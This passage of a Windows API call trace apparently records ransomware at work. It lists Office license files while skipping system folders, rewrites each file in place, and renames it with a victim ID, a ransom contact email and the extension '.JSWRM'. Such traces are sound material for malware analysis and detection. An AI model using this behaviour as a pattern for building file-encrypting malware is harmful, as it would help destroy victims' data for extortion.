dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0107.581] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe8d59655, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe8d59655, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe8e3e493, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d61, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProfessionalR_OEM_Perp-ul-oob.xrm-ms", cAlternateFileName="PR38D6~1.XRM")) returned 1 [0107.581] lstrcmpiW (lpString1="ProfessionalR_OEM_Perp-ul-oob.xrm-ms", lpString2=".") returned 1 [0107.581] lstrcmpiW (lpString1="ProfessionalR_OEM_Perp-ul-oob.xrm-ms", lpString2="..") returned 1 [0107.581] lstrcmpiW (lpString1="ProfessionalR_OEM_Perp-ul-oob.xrm-ms", lpString2="...") returned 1 [0107.581] lstrcmpiW (lpString1="ProfessionalR_OEM_Perp-ul-oob.xrm-ms", lpString2="windows") returned -1 [0107.581] lstrcmpiW (lpString1="ProfessionalR_OEM_Perp-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0107.581] lstrcmpiW (lpString1="ProfessionalR_OEM_Perp-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0107.581] lstrcmpiW (lpString1="ProfessionalR_OEM_Perp-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0107.581] lstrcmpiW (lpString1="ProfessionalR_OEM_Perp-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.581] lstrcmpiW (lpString1="ProfessionalR_OEM_Perp-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0107.581] lstrcmpiW (lpString1="ProfessionalR_OEM_Perp-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0107.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c170 [0107.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0107.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22d0a0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProfessionalR_OEM_Perp-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0107.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c170 | out: hHeap=0x1e0000) returned 1 [0107.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22be00 [0107.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0107.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0107.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalR_OEM_Perp-ul-oob.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22cdc8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProfessionalR_OEM_Perp-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0107.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22be00 | out: hHeap=0x1e0000) returned 1 [0107.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0107.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0107.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0107.582] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalR_OEM_Perp-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalr_oem_perp-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.582] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11617) returned 1 [0107.582] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d60) returned 0x24c1d0 [0107.582] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d60, lpOverlapped=0x0) returned 1 [0107.587] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.587] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d60, lpOverlapped=0x0) returned 1 [0107.587] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.587] CloseHandle (hObject=0x45c) returned 1 [0107.587] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0107.587] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.587] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0107.587] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.587] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0107.587] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0107.587] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.587] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0107.587] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.587] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0107.587] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bce0 [0107.587] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f5f8 [0107.587] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0107.587] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0107.587] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalR_OEM_Perp-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalr_oem_perp-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalR_OEM_Perp-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalr_oem_perp-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.588] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0107.588] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0107.588] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0107.588] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0107.588] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.588] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe8d33409, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe8d33409, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe8e18254, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4dfa, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProfessionalR_OEM_Perp-ul-phn.xrm-ms", cAlternateFileName="PR893E~1.XRM")) returned 1 [0107.588] lstrcmpiW (lpString1="ProfessionalR_OEM_Perp-ul-phn.xrm-ms", lpString2=".") returned 1 [0107.588] lstrcmpiW (lpString1="ProfessionalR_OEM_Perp-ul-phn.xrm-ms", lpString2="..") returned 1 [0107.588] lstrcmpiW (lpString1="ProfessionalR_OEM_Perp-ul-phn.xrm-ms", lpString2="...") returned 1 [0107.588] lstrcmpiW (lpString1="ProfessionalR_OEM_Perp-ul-phn.xrm-ms", lpString2="windows") returned -1 [0107.588] lstrcmpiW (lpString1="ProfessionalR_OEM_Perp-ul-phn.xrm-ms", lpString2="recovery") returned -1 [0107.588] lstrcmpiW (lpString1="ProfessionalR_OEM_Perp-ul-phn.xrm-ms", lpString2="perflogs") returned 1 [0107.589] lstrcmpiW (lpString1="ProfessionalR_OEM_Perp-ul-phn.xrm-ms", lpString2="documents and settings") returned 1 [0107.589] lstrcmpiW (lpString1="ProfessionalR_OEM_Perp-ul-phn.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.589] lstrcmpiW (lpString1="ProfessionalR_OEM_Perp-ul-phn.xrm-ms", lpString2="system volume information") returned -1 [0107.589] lstrcmpiW (lpString1="ProfessionalR_OEM_Perp-ul-phn.xrm-ms", lpString2="msocache") returned 1 [0107.589] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c220 [0107.589] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0107.589] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0107.589] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22cdc8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProfessionalR_OEM_Perp-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0107.589] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c220 | out: hHeap=0x1e0000) returned 1 [0107.589] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0107.589] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0107.589] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0107.589] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalR_OEM_Perp-ul-phn.xrm-ms", cchWideChar=36, lpMultiByteStr=0x22ce70, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProfessionalR_OEM_Perp-ul-phn.xrm-ms", lpUsedDefaultChar=0x0) returned 36 [0107.589] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0107.589] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0107.589] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0107.589] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.589] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.589] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0107.589] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalR_OEM_Perp-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalr_oem_perp-ul-phn.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.590] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=19962) returned 1 [0107.590] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.590] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4df0) returned 0x24c1d0 [0107.590] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x4df0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x4df0, lpOverlapped=0x0) returned 1 [0107.606] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.606] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x4df0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x4df0, lpOverlapped=0x0) returned 1 [0107.606] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.607] CloseHandle (hObject=0x45c) returned 1 [0107.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0107.607] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.607] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0107.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.607] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0107.607] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0107.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24be70 [0107.607] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ede0 [0107.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24be70 | out: hHeap=0x1e0000) returned 1 [0107.607] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0107.607] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalR_OEM_Perp-ul-phn.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalr_oem_perp-ul-phn.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalR_OEM_Perp-ul-phn.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalr_oem_perp-ul-phn.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ede0 | out: hHeap=0x1e0000) returned 1 [0107.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0107.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0107.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0107.608] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0107.608] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe8d33409, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe8d33409, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe8efd04b, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x299f, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProfessionalR_Retail-pl.xrm-ms", cAlternateFileName="PR6632~1.XRM")) returned 1 [0107.608] lstrcmpiW (lpString1="ProfessionalR_Retail-pl.xrm-ms", lpString2=".") returned 1 [0107.608] lstrcmpiW (lpString1="ProfessionalR_Retail-pl.xrm-ms", lpString2="..") returned 1 [0107.608] lstrcmpiW (lpString1="ProfessionalR_Retail-pl.xrm-ms", lpString2="...") returned 1 [0107.608] lstrcmpiW (lpString1="ProfessionalR_Retail-pl.xrm-ms", lpString2="windows") returned -1 [0107.608] lstrcmpiW (lpString1="ProfessionalR_Retail-pl.xrm-ms", lpString2="recovery") returned -1 [0107.608] lstrcmpiW (lpString1="ProfessionalR_Retail-pl.xrm-ms", lpString2="perflogs") returned 1 [0107.608] lstrcmpiW (lpString1="ProfessionalR_Retail-pl.xrm-ms", lpString2="documents and settings") returned 1 [0107.609] lstrcmpiW (lpString1="ProfessionalR_Retail-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.609] lstrcmpiW (lpString1="ProfessionalR_Retail-pl.xrm-ms", lpString2="system volume information") returned -1 [0107.609] lstrcmpiW (lpString1="ProfessionalR_Retail-pl.xrm-ms", lpString2="msocache") returned 1 [0107.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0107.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalR_Retail-pl.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0107.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0107.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalR_Retail-pl.xrm-ms", cchWideChar=30, lpMultiByteStr=0x241330, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProfessionalR_Retail-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0107.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0107.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0107.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalR_Retail-pl.xrm-ms", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0107.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0107.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProfessionalR_Retail-pl.xrm-ms", cchWideChar=30, lpMultiByteStr=0x241358, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProfessionalR_Retail-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 30 [0107.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0107.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0107.609] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0107.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.609] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.609] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0107.609] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProfessionalR_Retail-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\professionalr_retail-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.610] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10655) returned 1 [0107.610] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.610] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2990) returned 0x24c1d0 [0107.610] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2990, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2990, lpOverlapped=0x0) returned 1 [0107.613] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.613] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2990, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2990, lpOverlapped=0x0) returned 1 [0107.613] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.613] CloseHandle (hObject=0x45c) returned 1 [0107.613] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0107.613] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.613] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0107.613] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.613] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0107.613] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0107.613] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.613] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0107.613] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0107.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0107.614] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e7a0 [0107.614] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 